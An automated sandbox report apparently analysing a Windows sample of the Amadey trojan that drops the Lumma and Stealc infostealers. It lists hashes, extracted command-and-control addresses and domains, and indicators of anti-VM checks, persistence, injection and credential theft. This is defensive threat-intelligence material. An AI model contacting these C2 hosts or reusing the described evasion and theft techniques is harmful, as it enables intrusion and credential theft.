amadey | f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664

Analysis

max time kernel
52s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
04-12-2024 04:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe
Size

3.1MB
MD5

15486167d3ce2f6d927debe5fb800377
SHA1

762704e63f652670244fa24b31883104e7df479b
SHA256

f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664
SHA512

9fc904cfc59fa81033a032b1fb451da1e5de784d40c1be05afacc65c97a4b71d4bb29b5d858c456d70b2e5ef900bf2e02f540679bf84c2452e515edd8fbd089c
SSDEEP

49152:nMuDtQ1Wh5zrjADAErj+BLkfXP/IjgvHxfFZT:MuBQ1Wh5PjADAErlfXPNZDT

Score

10^/10

amadey lumma stealc 9c9aa5 default_valenciga drum fed3aa credential_access discovery evasion execution persistence spyware stealer trojan

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

http://185.215.113.43

Attributes

install_dir
abc3bc1985
install_file
skotes.exe
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
url_paths
/Zu7JuNko/index.php

rc4.plain

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

http://185.215.113.16

Attributes

install_dir
44111dbc49
install_file
axplong.exe
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
url_paths
/Jo89Ku7d/index.php

rc4.plain

Extracted

Family

stealc

Botnet

default_valenciga

http://185.215.113.17

Attributes

url_path
/2fb6c2cc8dce150a.php

Extracted

Family

lumma

https://drive-connect.cyou

https://crib-endanger.sbs

https://faintbl0w.sbs

https://300snails.sbs

https://bored-light.sbs

https://3xc1aimbl0w.sbs

https://pull-trucker.sbs

https://fleez-inc.sbs

https://thicktoys.sbs

Extracted

Family

stealc

Botnet

drum

http://185.215.113.206

Attributes

url_path
/c4becf79229cb002.php

Extracted

Family

lumma

https://drive-connect.cyou/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Enumerates VirtualBox registry keys 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF	80ccf02432.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	309f071fed.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	9e66340a0d.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	139408cf1c.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	80ccf02432.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	9b99e21764.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	4e8cfcc349.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	v_dolg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	7c5d00adc5.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	c8684ada8a.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
928	powershell.exe
5348	powershell.exe
4644	powershell.exe
4196	powershell.exe
5668	powershell.exe
2252	powershell.exe
3800	powershell.exe
3768	powershell.exe
6800	powershell.exe
4800	powershell.exe
832	powershell.exe
4392	powershell.exe
5528	powershell.exe
4980	powershell.exe
6152	powershell.exe
4788	powershell.exe
6676	powershell.exe
5268	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 28 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	309f071fed.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	139408cf1c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7c5d00adc5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	139408cf1c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4e8cfcc349.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4e8cfcc349.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7c5d00adc5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	v_dolg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	v_dolg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9e66340a0d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9b99e21764.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	c8684ada8a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	80ccf02432.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	c8684ada8a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	309f071fed.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9b99e21764.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	80ccf02432.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9e66340a0d.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	309f071fed.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	axplong.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	AllNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	am209.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	Gxtuum.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	skotes.exe

Executes dropped EXE 27 IoCs

pid	Process
524	skotes.exe
1528	stories.exe
2948	stories.tmp
3532	videojet3264.exe
2552	309f071fed.exe
4356	axplong.exe
100	stealc_default2.exe
5040	GI59vO6.exe
4512	alex2022.exe
2796	alex2022.exe
4488	9e66340a0d.exe
3460	139408cf1c.exe
4944	AllNew.exe
4000	Gxtuum.exe
3960	axplong.exe
4768	skotes.exe
1868	80ccf02432.exe
1192	Gxtuum.exe
4120	4e8cfcc349.exe
1240	trru7rd2.exe
4524	am209.exe
1996	defnur.exe
4220	Office2024.exe
3636	7c5d00adc5.exe
456	v_dolg.exe
3192	9b99e21764.exe
1868	c8684ada8a.exe

Identifies Wine through registry keys 2 TTPs 13 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	139408cf1c.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	4e8cfcc349.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	7c5d00adc5.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	309f071fed.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	9b99e21764.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	c8684ada8a.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	9e66340a0d.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	80ccf02432.exe

Loads dropped DLL 4 IoCs

pid	Process
2948	stories.tmp
3532	videojet3264.exe
100	stealc_default2.exe
100	stealc_default2.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7c5d00adc5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011869001\\7c5d00adc5.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c8684ada8a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1005246001\\c8684ada8a.exe"	axplong.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4e8cfcc349.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011868001\\4e8cfcc349.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9b99e21764.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1005245001\\9b99e21764.exe"	axplong.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	v_dolg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
231	pastebin.com
182	pastebin.com
183	pastebin.com

Power Settings 1 TTPs 16 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
6484	powercfg.exe
6268	powercfg.exe
3308	powercfg.exe
6476	powercfg.exe
6792	powercfg.exe
7024	powercfg.exe
4388	powercfg.exe
5368	powercfg.exe
5184	powercfg.exe
7112	powercfg.exe
6488	powercfg.exe
6904	powercfg.exe
5916	powercfg.exe
2044	powercfg.exe
5636	powercfg.exe
7052	powercfg.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0009000000023d3e-750.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs

pid	Process
3892	f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe
524	skotes.exe
2552	309f071fed.exe
4356	axplong.exe
4488	9e66340a0d.exe
3460	139408cf1c.exe
3960	axplong.exe
4768	skotes.exe
1868	80ccf02432.exe
4120	4e8cfcc349.exe
3636	7c5d00adc5.exe
456	v_dolg.exe
3192	9b99e21764.exe
1868	c8684ada8a.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4512 set thread context of 2796	4512	alex2022.exe	117

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe
File created	C:\Windows\Tasks\axplong.job	309f071fed.exe
File created	C:\Windows\Tasks\Gxtuum.job	AllNew.exe
File created	C:\Windows\Tasks\defnur.job	am209.exe

Launches sc.exe 24 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2664	sc.exe
7128	sc.exe
3376	sc.exe
3332	sc.exe
5344	sc.exe
6520	sc.exe
3604	sc.exe
5452	sc.exe
6668	sc.exe
5028	sc.exe
2672	sc.exe
1532	sc.exe
6396	sc.exe
1484	sc.exe
5060	sc.exe
4340	sc.exe
6204	sc.exe
1116	sc.exe
6164	sc.exe
1176	sc.exe
6536	sc.exe
6148	sc.exe
7024	sc.exe
1376	sc.exe

Embeds OpenSSL 1 IoCs

Embeds OpenSSL, may be used to circumvent TLS interception.

resource	yara_rule
behavioral2/files/0x0007000000023d0e-527.dat	embeds_openssl

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 6 IoCs

pid	pid_target	Process	procid_target
4088	4120	WerFault.exe	140
6412	456	WerFault.exe	158
6452	456	WerFault.exe	158
6496	1868	WerFault.exe	160
6980	5040	WerFault.exe	114
6416	7056	WerFault.exe	274

System Location Discovery: System Language Discovery 1 TTPs 40 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	139408cf1c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	defnur.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	alex2022.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	alex2022.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9e66340a0d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4e8cfcc349.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	309f071fed.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7c5d00adc5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9b99e21764.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	trru7rd2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	am209.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	stories.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	stories.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	stealc_default2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GI59vO6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c8684ada8a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	axplong.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AllNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	80ccf02432.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	v_dolg.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	stealc_default2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	stealc_default2.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
5524	taskkill.exe
5580	taskkill.exe
5636	taskkill.exe
5692	taskkill.exe
5400	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3892	f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe
3892	f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe
524	skotes.exe
524	skotes.exe
2948	stories.tmp
2948	stories.tmp
1584	powershell.exe
1584	powershell.exe
2252	powershell.exe
2252	powershell.exe
2552	309f071fed.exe
2552	309f071fed.exe
4356	axplong.exe
4356	axplong.exe
4788	powershell.exe
4788	powershell.exe
4788	powershell.exe
1560	powershell.exe
1560	powershell.exe
1560	powershell.exe
100	stealc_default2.exe
100	stealc_default2.exe
4488	9e66340a0d.exe
4488	9e66340a0d.exe
3460	139408cf1c.exe
3460	139408cf1c.exe
3800	powershell.exe
3800	powershell.exe
3800	powershell.exe
2612	powershell.exe
2612	powershell.exe
2612	powershell.exe
3960	axplong.exe
3960	axplong.exe
4768	skotes.exe
4768	skotes.exe
1868	80ccf02432.exe
1868	80ccf02432.exe
3768	powershell.exe
3768	powershell.exe
3768	powershell.exe
1868	80ccf02432.exe
1868	80ccf02432.exe
1868	80ccf02432.exe
1868	80ccf02432.exe
1868	80ccf02432.exe
1868	80ccf02432.exe
1868	80ccf02432.exe
1868	80ccf02432.exe
100	stealc_default2.exe
100	stealc_default2.exe
4120	4e8cfcc349.exe
4120	4e8cfcc349.exe
4392	powershell.exe
4392	powershell.exe
4392	powershell.exe
1120	powershell.exe
1120	powershell.exe
1120	powershell.exe
928	powershell.exe
928	powershell.exe
928	powershell.exe
3636	7c5d00adc5.exe
3636	7c5d00adc5.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1584	powershell.exe
Token: SeDebugPrivilege	2252	powershell.exe
Token: SeDebugPrivilege	4788	powershell.exe
Token: SeDebugPrivilege	1560	powershell.exe
Token: SeIncreaseQuotaPrivilege	1560	powershell.exe
Token: SeSecurityPrivilege	1560	powershell.exe
Token: SeTakeOwnershipPrivilege	1560	powershell.exe
Token: SeLoadDriverPrivilege	1560	powershell.exe
Token: SeSystemProfilePrivilege	1560	powershell.exe
Token: SeSystemtimePrivilege	1560	powershell.exe
Token: SeProfSingleProcessPrivilege	1560	powershell.exe
Token: SeIncBasePriorityPrivilege	1560	powershell.exe
Token: SeCreatePagefilePrivilege	1560	powershell.exe
Token: SeBackupPrivilege	1560	powershell.exe
Token: SeRestorePrivilege	1560	powershell.exe
Token: SeShutdownPrivilege	1560	powershell.exe
Token: SeDebugPrivilege	1560	powershell.exe
Token: SeSystemEnvironmentPrivilege	1560	powershell.exe
Token: SeRemoteShutdownPrivilege	1560	powershell.exe
Token: SeUndockPrivilege	1560	powershell.exe
Token: SeManageVolumePrivilege	1560	powershell.exe
Token: 33	1560	powershell.exe
Token: 34	1560	powershell.exe
Token: 35	1560	powershell.exe
Token: 36	1560	powershell.exe
Token: SeDebugPrivilege	3800	powershell.exe
Token: SeIncreaseQuotaPrivilege	3800	powershell.exe
Token: SeSecurityPrivilege	3800	powershell.exe
Token: SeTakeOwnershipPrivilege	3800	powershell.exe
Token: SeLoadDriverPrivilege	3800	powershell.exe
Token: SeSystemProfilePrivilege	3800	powershell.exe
Token: SeSystemtimePrivilege	3800	powershell.exe
Token: SeProfSingleProcessPrivilege	3800	powershell.exe
Token: SeIncBasePriorityPrivilege	3800	powershell.exe
Token: SeCreatePagefilePrivilege	3800	powershell.exe
Token: SeBackupPrivilege	3800	powershell.exe
Token: SeRestorePrivilege	3800	powershell.exe
Token: SeShutdownPrivilege	3800	powershell.exe
Token: SeDebugPrivilege	3800	powershell.exe
Token: SeSystemEnvironmentPrivilege	3800	powershell.exe
Token: SeRemoteShutdownPrivilege	3800	powershell.exe
Token: SeUndockPrivilege	3800	powershell.exe
Token: SeManageVolumePrivilege	3800	powershell.exe
Token: 33	3800	powershell.exe
Token: 34	3800	powershell.exe
Token: 35	3800	powershell.exe
Token: 36	3800	powershell.exe
Token: SeIncreaseQuotaPrivilege	3800	powershell.exe
Token: SeSecurityPrivilege	3800	powershell.exe
Token: SeTakeOwnershipPrivilege	3800	powershell.exe
Token: SeLoadDriverPrivilege	3800	powershell.exe
Token: SeSystemProfilePrivilege	3800	powershell.exe
Token: SeSystemtimePrivilege	3800	powershell.exe
Token: SeProfSingleProcessPrivilege	3800	powershell.exe
Token: SeIncBasePriorityPrivilege	3800	powershell.exe
Token: SeCreatePagefilePrivilege	3800	powershell.exe
Token: SeBackupPrivilege	3800	powershell.exe
Token: SeRestorePrivilege	3800	powershell.exe
Token: SeShutdownPrivilege	3800	powershell.exe
Token: SeDebugPrivilege	3800	powershell.exe
Token: SeSystemEnvironmentPrivilege	3800	powershell.exe
Token: SeRemoteShutdownPrivilege	3800	powershell.exe
Token: SeUndockPrivilege	3800	powershell.exe
Token: SeManageVolumePrivilege	3800	powershell.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
3892	f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe
2948	stories.tmp
4944	AllNew.exe
4524	am209.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3892 wrote to memory of 524	3892	f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe	83
PID 3892 wrote to memory of 524	3892	f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe	83
PID 3892 wrote to memory of 524	3892	f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe	83
PID 524 wrote to memory of 1528	524	skotes.exe	91
PID 524 wrote to memory of 1528	524	skotes.exe	91
PID 524 wrote to memory of 1528	524	skotes.exe	91
PID 1528 wrote to memory of 2948	1528	stories.exe	92
PID 1528 wrote to memory of 2948	1528	stories.exe	92
PID 1528 wrote to memory of 2948	1528	stories.exe	92
PID 2948 wrote to memory of 928	2948	stories.tmp	95
PID 2948 wrote to memory of 928	2948	stories.tmp	95
PID 2948 wrote to memory of 928	2948	stories.tmp	95
PID 2948 wrote to memory of 3532	2948	stories.tmp	97
PID 2948 wrote to memory of 3532	2948	stories.tmp	97
PID 2948 wrote to memory of 3532	2948	stories.tmp	97
PID 928 wrote to memory of 2880	928	net.exe	98
PID 928 wrote to memory of 2880	928	net.exe	98
PID 928 wrote to memory of 2880	928	net.exe	98
PID 524 wrote to memory of 2756	524	skotes.exe	104
PID 524 wrote to memory of 2756	524	skotes.exe	104
PID 524 wrote to memory of 2756	524	skotes.exe	104
PID 2756 wrote to memory of 4968	2756	cmd.exe	106
PID 2756 wrote to memory of 4968	2756	cmd.exe	106
PID 2756 wrote to memory of 4968	2756	cmd.exe	106
PID 2756 wrote to memory of 1584	2756	cmd.exe	107
PID 2756 wrote to memory of 1584	2756	cmd.exe	107
PID 2756 wrote to memory of 1584	2756	cmd.exe	107
PID 1584 wrote to memory of 2252	1584	powershell.exe	108
PID 1584 wrote to memory of 2252	1584	powershell.exe	108
PID 1584 wrote to memory of 2252	1584	powershell.exe	108
PID 524 wrote to memory of 2552	524	skotes.exe	109
PID 524 wrote to memory of 2552	524	skotes.exe	109
PID 524 wrote to memory of 2552	524	skotes.exe	109
PID 2552 wrote to memory of 4356	2552	309f071fed.exe	110
PID 2552 wrote to memory of 4356	2552	309f071fed.exe	110
PID 2552 wrote to memory of 4356	2552	309f071fed.exe	110
PID 1584 wrote to memory of 4788	1584	powershell.exe	230
PID 1584 wrote to memory of 4788	1584	powershell.exe	230
PID 1584 wrote to memory of 4788	1584	powershell.exe	230
PID 4356 wrote to memory of 100	4356	axplong.exe	113
PID 4356 wrote to memory of 100	4356	axplong.exe	113
